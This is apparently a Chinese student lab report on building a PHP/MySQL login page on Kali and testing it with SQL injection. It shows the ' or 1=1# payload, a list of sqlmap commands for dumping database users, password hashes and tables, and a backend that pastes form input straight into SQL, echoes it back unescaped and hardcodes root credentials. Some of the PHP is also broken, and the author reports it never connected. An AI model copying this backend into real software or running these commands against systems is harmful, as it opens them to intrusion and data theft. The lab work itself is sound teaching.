Exp8 Web基础
实验内容
实验环境
- 主机
Kali - 靶机
Kali
实验工具
- 后台语言 'PHP'
- 服务器 'Apache'
- 数据库 'Mysql'
建站过程
本次实验,利用Kali内的Apache服务器建站
首先,利用
root@Kali:~# sudo apt-get install apache2
- 下载安装apache
root@Kali:~# apachectl start
- 打开Apache服务
root@Kali:~# netstat -aptn
- 查看一下端口占用
Web前端:HTML基础
root@Kali:~# cd var/www/html
- 找到Apache的工作目录,之后需要在该目录下创建一个前端页面login.html。
具体代码见知识点
<meta charset="UTF-8"> //设置页面编码格式,可以解决乱码情况
···
<form method ="POST" action="login_controller.php" name="loginform" > //表单属性,表单名称loginform,通过POST传输到后台,调用login_controller.php这一后台文件
···
<td>
<input type="text" name="username" value="Your name" size="20" maxlength="20" onfocus="if (this.value=='Your name') this.value='';" />
//文本框,名称username,长度为20,默认值为Your name,当为默认值时,提交null。
</td>
···
<td>
<input type="password" name="password" value="Your password" size="20" maxlength="20" onfocus="if (this.value=='Your password') this.value='';" />
//密码框,名称为password,长度为20,默认值为Your password,当为默认值时,提交null。
</td>
···
<script language="javascript"> //js脚本,通过onclick()调用
function validateLogin(){
var sUserName = document.loginform.username.value ;
var sPassword = document.loginform.password.value ;
//获取表单中用户名密码值
if ((sUserName =="") || (sUserName=="Your name")){
alert("请输入用户名!");
return false ;
}
if ((sPassword =="") || (sPassword=="Your password")){
alert("请输入密码!");
return false ;
}
//判断为空,弹出alert提示
}
</script>
- 效果如下
数据库:MySQL基础
- 为了能够储存用户名密码,我们需要建立一个账号数据库。
root@Kali:~# /etc/init.d/mysql start
- 打开Kali的mysql服务
root@Kali:~# mysql -u root -p
- 登录mysql,默认密码为
p@ssw0rd
MariaDB [(none)]> use mysql //使用mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> update user set password=PASSWORD("密码") where user='root';//更新用户密码
MariaDB [mysql]> flush privileges;//提权
Query OK, 0 rows affected (0.00 sec)
MariaDB [mysql]> quit//退出后重新登录
- 设置mysql
MariaDB [mysql]> create database exp8_login_db;
//创建一个数据库
Query OK, 1 row affected (0.01 sec)
MariaDB [mysql]> use exp8_login_db;
Database changed
MariaDB [exp8_login_db]> create table exp8_login_table (login_username VARCHAR(20),login_pwd VARCHAR(20));
Query OK, 0 rows affected (0.04 sec)
//创建一个数据表并设置字段
MariaDB [exp8_login_db]> show tables;
+-------------------------+
| Tables_in_exp8_login_db |
+-------------------------+
| exp8_login_table |
+-------------------------+
- 需要建立一个数据库,在新建一张数据表,表中有账号,密码字段
MariaDB [exp8_login_db]> insert into exp8_login_table values('admin','test1234');//插入一条数据
Query OK, 1 row affected (0.01 sec)
MariaDB [exp8_login_db]> select * from exp8_login_table;
+----------------+-----------+
| login_username | login_pwd |
+----------------+-----------+
| admin | test1234 |
+----------------+-----------+
1 row in set (0.00 sec)
- 为网站提供一对账号,密码。
Web后台:PHP基础
-
有了前端页面,数据库之后,我们需要用PHP语言写一个后台,用以处理接受到的前端数据,并链接数据库,比对前端接受的账号密码与数据库中是否匹配。
-
在/var/www/html目录下新建一个PHP文件
login_controller.php
具体代码见知识点
$uname=($_POST["username"]);
$pwd=($_POST["password"]);
echo $uname;
echo $pwd;
- 用POST方法获取前端username,password并储存在变量中,可以用echo查看返回值。
- 这里注意前后台方法必须相同,否则接收不到数据。
GET 和 POST 被视作 $_GET 和 $_POST。它们是超全局变量,这意味着对它们的访问无需考虑作用域 - 无需任何特殊代码,您能够从任何函数、类或文件访问它们。
- $_GET 是通过 URL 参数传递到当前脚本的变量数组。
- $_POST 是通过 HTTP POST 传递到当前脚本的变量数组。
何时使用 GET?
通过 GET 方法从表单发送的信息对任何人都是可见的(所有变量名和值都显示在 URL 中)。GET 对所发送信息的数量也有限制。限制在大于 2000 个字符。不过,由于变量显示在 URL 中,把页面添加到书签中也更为方便。
GET 可用于发送非敏感的数据。
注释:绝不能使用 GET 来发送密码或其他敏感信息!
何时使用 POST?
通过 POST 方法从表单发送的信息对其他人是不可见的(所有名称/值会被嵌入 HTTP 请求的主体中),并且对所发送信息的数量也无限制。
此外 POST 支持高阶功能,比如在向服务器上传文件时进行 multi-part 二进制输入。
不过,由于变量未显示在 URL 中,也就无法将页面添加到书签。
提示:开发者偏爱 POST 来发送表单数据。
$query_str=
"SELECT * FROM exp8_login_table where login_username='{$uname}' and login_pwd='{$pwd}';";
- 设计一条SQL语句,查询对应账号密码的数据
$con = mysql_connect("localhost:3306","root","toor");
mysql_select_db("exp8_login_db", $con);
- 链接本地数据库,依次是
地址,账号,密码,并选择数据库。
if ($result = $mysql_query($query_str)) {
if ($result->num_rows > 0 ){
echo "<br> Wellcome login Mr/Mrs:{$uname} <br> ";
} else {
echo "<br> login failed!!!! <br> " ;
}
- 接受数据库返回查询结果,非零则返回登陆成功,否则登录失败。
由于php缺少mysql扩展模块,最终后台连接mysql失败。
SQL注入
Tip: 这边利用一下之前写的java网站,尝试注入
1.在用户名输入框中输入' or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为select * from lxmtable where username='' or 1=1#' and password='',#相当于注释符,会把后面的内容都注释掉,而1=1是永真式,所以这个条件肯定恒成立,所以能够成功登陆:
并没有成功,原因其实很简单,因为登录的账号类型是数字,而注入的是字符串,造成了错误抛出。
2.sqlmap攻击
(1)判断当前用户是否是dba: ./sqlmap.py -u "url" --is-dba -v 1
(2)列出数据库管理系统用户:./sqlmap.py -u "url" --users -v 0
(3)数据库用户密码(hash):
./sqlmap.py -u "url" --passwords -v 0
./sqlmap.py -u "url" --passwords -U sa -v 0
(4)查看用户权限:
./sqlmap.py -u "url" --privileges -v 0
./sqlmap.py -u "url" --privileges -U postgres -v 0
(5)列出数据库:
./sqlmap.py -u "url" --dbs -v 0
(6)列出数据库表:
./sqlmap.py -u "url" --tables -D "information_scheam"
(7)列出表中的列名:
./sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1
(8)列出指定列的内容:
./sqlmap.py -u "url" --dump -T "users" -D "testdb" -C “指定字段”
找到自己的注入点
mybatis的mapper中getUsers函数
但是注入被过滤了,通过后台可以看到sqlmap的字典注入字段,以及后台的抛出日志。
知识点
1.前端HTML文件 login.html
<html>
<head>
<meta charset="UTF-8">
<title>test</title>
</head>
<body>
<table>
<form method ="POST" action="login_controller.php" name="loginform" >
<tr>
<td>用户名:</td>
<td><input type="text" name="username" value="Your name" size="20" maxlength="20" onfocus="if (this.value=='Your name') this.value='';" /></td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>密 码:</td>
<td><input type="password" name="password" value="Your password" size="20" maxlength="20" onfocus="if (this.value=='Your password') this.value='';" /></td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type="checkbox" name="zlogin" value="1">自动登录</td>
</tr>
<table>
<tr>
<td><input type="submit" name="login" value="登录" onClick="return validateLogin()"/></td>
<td><input type="reset" name="rs" value="重置" /></td>
</tr>
</table>
</form>
</table>
<script language="javascript">
function validateLogin(){
var sUserName = document.loginform.username.value ;
var sPassword = document.loginform.password.value ;
if ((sUserName =="") || (sUserName=="Your name")){
alert("请输入用户名!");
return false ;
}
if ((sPassword =="") || (sPassword=="Your password")){
alert("请输入密码!");
return false ;
}
}
</script>
</body>
</html>
2.后台文件login_controller.php
<?php
$uname=($_POST["username"]);
$pwd=($_POST["password"]);
echo "<br>$uname<br>";
echo "<br>$pwd<br>";
$query_str="SELECT * FROM exp8_login_table where login_username='{$uname}' and login_pwd='{$pwd}';";
$con = mysql_connect("localhost:3306","root","toor");
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
echo "connect ok!";
mysql_select_db("exp8_login_db", $con);
/* Select queries return a resultset */
if ($result = mysql_query($query_str)) {
if ($result->num_rows > 0 ){
echo "<br> Wellcome login Mr/Mrs:{$uname} <br> ";
} else {
echo "<br> login failed!!!! <br> " ;
}
/* free result set */
$result->close();
}
mysql_close($con);
?>